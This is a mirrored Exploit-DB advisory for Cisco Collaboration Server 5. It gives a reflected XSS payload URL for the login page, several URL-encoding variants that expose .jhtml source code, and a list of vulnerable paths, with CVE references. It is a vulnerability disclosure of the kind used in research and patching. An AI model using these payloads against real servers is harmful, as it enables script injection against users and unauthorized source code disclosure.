- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11403
- Проверка EDB
-
- Пройдено
- Автор
- S4SQUATCH
- Тип уязвимости
- WEBAPPS
- Платформа
- MULTIPLE
- CVE
- cve-2010-0642 cve-2010-0641
- Дата публикации
- 2010-02-11
Код:
Cisco Collaboration Server 5 XSS, Source Code Disclosure
Discovered by: s4squatch of SecureState R&D Team (www.securestate.com)
Discovered: 08/26/2008
Note: End of Engineering --> http://www.cisco.com/en/US/products/sw/custcosw/ps747/prod_eol_notice09186a008032d4d0.html
Replaced with: http://www.cisco.com/en/US/products/ps7233/index.html and http://www.cisco.com/en/US/products/ps7236/index.html
XSS
===
http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="><script>alert('xss!')</script>
Java Servlet Source Code Disclosure
===================================
The source code of .jhtml files is revealed to the end user by requesting any of the following:
Normal File: file.html
Modified 1: file%2Ejhtml
Modified 2: file.jhtm%6C
Modified 3: file.jhtml%00
Modified 4: file.jhtml%c0%80
Cisco Collaboration Server 5 Paths It Works On (list may not be complete)
=========================================================================
http://www.website.com/doc/docindex.jhtml
http://www.website.com/browserId/wizardForm.jhtml
http://www.website.com/webline/html/forms/callback.jhtml
http://www.website.com/webline/html/forms/callbackICM.jhtml
http://www.website.com/webline/html/agent/AgentFrame.jhtml
http://www.website.com/webline/html/agent/default/badlogin.jhtml
http://www.website.com/callme/callForm.jhtml
http://www.website.com/webline/html/multichatui/nowDefunctWindow.jhtml
http://www.website.com/browserId/wizard.jhtml
http://www.website.com/admin/CiscoAdmin.jhtml
http://www.website.com/msccallme/mscCallForm.jhtml
http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml
Related Public Info
===================
https://www.securityfocus.com/bid/3592/info
https://www.securityfocus.com/bid/1578/info
https://www.securityfocus.com/bid/1328/info
- Источник
- www.exploit-db.com